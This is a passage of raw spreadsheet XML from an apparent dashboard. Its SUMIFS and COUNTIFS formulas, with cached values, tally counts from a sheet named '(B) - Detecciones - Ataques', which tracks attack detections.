        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>415</v>
      </c>
      <c r="Z76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>152095</v>
      </c>
      <c r="AA76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>31</v>
      </c>
      <c r="AB76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>202</v>
      </c>
      <c r="AC76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>29</v>
      </c>
      <c r="AD76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>872</v>
      </c>
      <c r="AE76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="AF76" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>5989</v>
      </c>
      <c r="AG76" s="271"/>
      <c r="AH76" s="352" t="s">
        <v>2546</v>
      </c>
      <c r="AI76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>3709</v>
      </c>
      <c r="AJ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>9</v>
      </c>
      <c r="AL76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>3177</v>
      </c>
      <c r="AN76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>162</v>
      </c>
      <c r="AR76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>3</v>
      </c>
      <c r="AV76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>38</v>
      </c>
      <c r="AY76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>2</v>
      </c>
      <c r="BA76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>14</v>
      </c>
      <c r="BB76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>18568</v>
      </c>
      <c r="BD76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>396</v>
      </c>
      <c r="BI76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>19</v>
      </c>
      <c r="BL76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>149723</v>
      </c>
      <c r="BN76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>2371</v>
      </c>
      <c r="BO76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>12</v>
      </c>
      <c r="BT76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>0</v>
      </c>
      <c r="BZ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>5</v>
      </c>
      <c r="CA76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>4</v>
      </c>
      <c r="CG76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>0</v>
      </c>
      <c r="CI76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>5</v>
      </c>
      <c r="CL76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>159</v>
      </c>
      <c r="CN76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>8</v>
      </c>
      <c r="CP76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>18</v>
      </c>
      <c r="CQ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>855</v>
      </c>
      <c r="CT76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>11</v>
      </c>
      <c r="CY76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>8</v>
      </c>
      <c r="DF76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>456</v>
      </c>
      <c r="DI76" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5505</v>
      </c>
      <c r="DJ76" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>14</v>
      </c>
      <c r="DK76" s="271"/>
      <c r="DO76" s="279"/>
      <c r="DP76" s="271"/>
      <c r="DQ76" s="271"/>
      <c r="DR76" s="271"/>
      <c r="DS76" s="271"/>
      <c r="DT76" s="271"/>
      <c r="DU76" s="271"/>
      <c r="DV76" s="271"/>
      <c r="DW76" s="271"/>
      <c r="DX76" s="271"/>
      <c r="DY76" s="271"/>
      <c r="DZ76" s="271"/>
      <c r="EA76" s="271"/>
      <c r="EB76" s="271"/>
      <c r="EC76" s="271"/>
      <c r="ED76" s="280"/>
      <c r="EG76" s="279"/>
      <c r="EH76" s="271"/>
      <c r="EI76" s="271"/>
      <c r="EJ76" s="271"/>
      <c r="EK76" s="271"/>
      <c r="EL76" s="271"/>
      <c r="EM76" s="271"/>
      <c r="EN76" s="271"/>
      <c r="EO76" s="271"/>
      <c r="EP76" s="478"/>
      <c r="EQ76" s="478"/>
      <c r="ER76" s="478"/>
      <c r="ES76" s="271"/>
      <c r="ET76" s="271"/>
      <c r="EU76" s="271"/>
      <c r="EV76" s="271"/>
      <c r="EW76" s="271"/>
      <c r="EX76" s="271"/>
      <c r="EY76" s="271"/>
      <c r="EZ76" s="271"/>
      <c r="FA76" s="280"/>
      <c r="FD76" s="480"/>
      <c r="FE76" s="480"/>
      <c r="FF76" s="480"/>
      <c r="FG76" s="480"/>
      <c r="FH76" s="480"/>
      <c r="FI76" s="480"/>
      <c r="FJ76" s="480"/>
      <c r="FK76" s="480"/>
      <c r="FL76" s="480"/>
      <c r="FM76" s="480"/>
      <c r="FN76" s="480"/>
      <c r="FO76" s="480"/>
      <c r="FP76" s="480"/>
      <c r="FQ76" s="480"/>
      <c r="FR76" s="480"/>
      <c r="FS76" s="480"/>
      <c r="FT76" s="480"/>
      <c r="FU76" s="480"/>
      <c r="FV76" s="480"/>
      <c r="FW76" s="480"/>
      <c r="FX76" s="480"/>
      <c r="FY76" s="379" t="s">
        <v>310</v>
      </c>
      <c r="FZ76" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*"))</f>
        <v>0.00119760479</v>
      </c>
      <c r="GA76" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GB76" s="480"/>
      <c r="GC76" s="379" t="s">
        <v>310</v>
      </c>
      <c r="GD76" s="454">
